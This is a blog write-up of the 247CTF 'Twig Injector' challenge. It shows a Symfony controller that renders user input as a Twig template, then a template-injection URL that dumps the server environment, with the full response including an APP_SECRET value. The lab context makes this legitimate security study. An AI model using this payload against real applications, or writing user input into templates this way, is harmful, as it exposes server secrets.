CREATIVE CHAOS   ▋ blog

The Twig Injector (web)

PUBLISHED ON 09/05/2023 — EDITED ON 13/12/2023 — 247CTF, INFOSEC

Hugo takes double curly braces { { (without whitespace in between) as a shortcode. Please delete the whitespace there when you try to use the command.

Intro

Can you abuse the Twig injector service to gain access to the flag hidden in the $_SERVER array?

Source

The regular expression /[^{\.}a-z\|\_]/ is used in the inject() method to remove any characters from the “inject” query parameter that are not letters (a-z), dots (.), curly braces ({ }), vertical bars (|), or underscores (_).

<?php

namespace App\Controller;

use Symfony\Component\HttpFoundation\Request;
use Symfony\Component\HttpFoundation\Response;
use Symfony\Component\Routing\Annotation\Route;
use Symfony\Bundle\FrameworkBundle\Controller\AbstractController;

class ChallengeController extends AbstractController
{

    /**
     * @Route("/inject")
     */
    public function inject(Request $request)
    {
        $inject = preg_replace('/[^{\.}a-z\|\_]/', '', $request->query->get('inject'));
        $response = new Response($this->get('twig')->createTemplate("Welcome to the twig injector!\n${inject}")->render());
        $response->headers->set('Content-Type', 'text/plain');
        return $response;
    }

    /**
     * @Route("/")
     */
    public function index()
    {
        return new Response(highlight_file(__FILE__, true));
    }
}

Solution

https://4cde81270944aaec.247ctf.com/inject?inject={ {%20app.request.server.all|json_encode|raw%20}}

The app.request.server.all|json_encode|raw part of the command is a Twig template expression that uses the json_encode filter to encode the $_SERVER array as JSON, and then uses the raw filter to output the JSON as-is.

When the application receives the curl request, it will evaluate the inject query parameter using the Twig template engine and include the resulting output, which should be the $_SERVER array encoded as JSON, in the response.

Note that the regular expression in the inject endpoint’s controller limits the characters that can be included in the inject query parameter. Therefore, you may need to modify the expression to conform to the allowed characters.

Welcome to the twig injector!
{"REDIRECT_STATUS":"200","HTTP_HOST":"4cde81270944aaec.247ctf.com","HTTP_X_REAL_IP":"193.105.127.7","HTTP_X_FORWARDED_FOR":"193.105.127.7","HTTP_X_FORWARDED_PROTO":"https","HTTP_CONNECTION":"Upgrade","HTTP_USER_AGENT":"Mozilla\/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko\/20100101 Firefox\/112.0","HTTP_ACCEPT":"text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,*\/*;q=0.8","HTTP_ACCEPT_LANGUAGE":"en-US,en;q=0.5","HTTP_ACCEPT_ENCODING":"gzip, deflate, br","HTTP_COOKIE":"__stripe_mid=1376bc02-ac8c-4781-b841-a14df422caff19b12a; __stripe_sid=ebca1aca-0d5b-4c03-8ce3-677ae2c3fbc11fa906","HTTP_UPGRADE_INSECURE_REQUESTS":"1","HTTP_SEC_FETCH_DEST":"document","HTTP_SEC_FETCH_MODE":"navigate","HTTP_SEC_FETCH_SITE":"none","HTTP_SEC_FETCH_USER":"?1","PATH":"\/usr\/local\/sbin:\/usr\/local\/bin:\/usr\/sbin:\/usr\/bin:\/sbin:\/bin","SERVER_SIGNATURE":"","SERVER_SOFTWARE":"Apache","SERVER_NAME":"4cde81270944aaec.247ctf.com","SERVER_ADDR":"172.17.0.6","SERVER_PORT":"80","REMOTE_ADDR":"144.76.74.118","DOCUMENT_ROOT":"\/var\/www\/html\/public\/","REQUEST_SCHEME":"http","CONTEXT_PREFIX":"","CONTEXT_DOCUMENT_ROOT":"\/var\/www\/html\/public\/","SERVER_ADMIN":"[no address given]","SCRIPT_FILENAME":"\/var\/www\/html\/public\/index.php","REMOTE_PORT":"54980","REDIRECT_URL":"\/inject","REDIRECT_QUERY_STRING":"inject={ {%20app.request.server.all|json_encode|raw%20}}","GATEWAY_INTERFACE":"CGI\/1.1","SERVER_PROTOCOL":"HTTP\/1.1","REQUEST_METHOD":"GET","QUERY_STRING":"inject={ {%20app.request.server.all|json_encode|raw%20}}","REQUEST_URI":"\/inject?inject={ {%20app.request.server.all|json_encode|raw%20}}","SCRIPT_NAME":"\/index.php","PHP_SELF":"\/index.php","REQUEST_TIME_FLOAT":1683634160.257,"REQUEST_TIME":1683634160,"SYMFONY_ENV":"prod","APP_ENV":"prod","APP_DEBUG":"0","APP_SECRET":"9eb18d9411835ab9db43feaef980738f","APP_FLAG":"247CTF{xxxxxxxxxxxxxxxxxxxxxxxx}","SYMFONY_DOTENV_VARS":"SYMFONY_ENV,APP_ENV,APP_DEBUG,APP_SECRET,APP_FLAG"}
TAGS: 247CTF, PHP, TWIG, WEB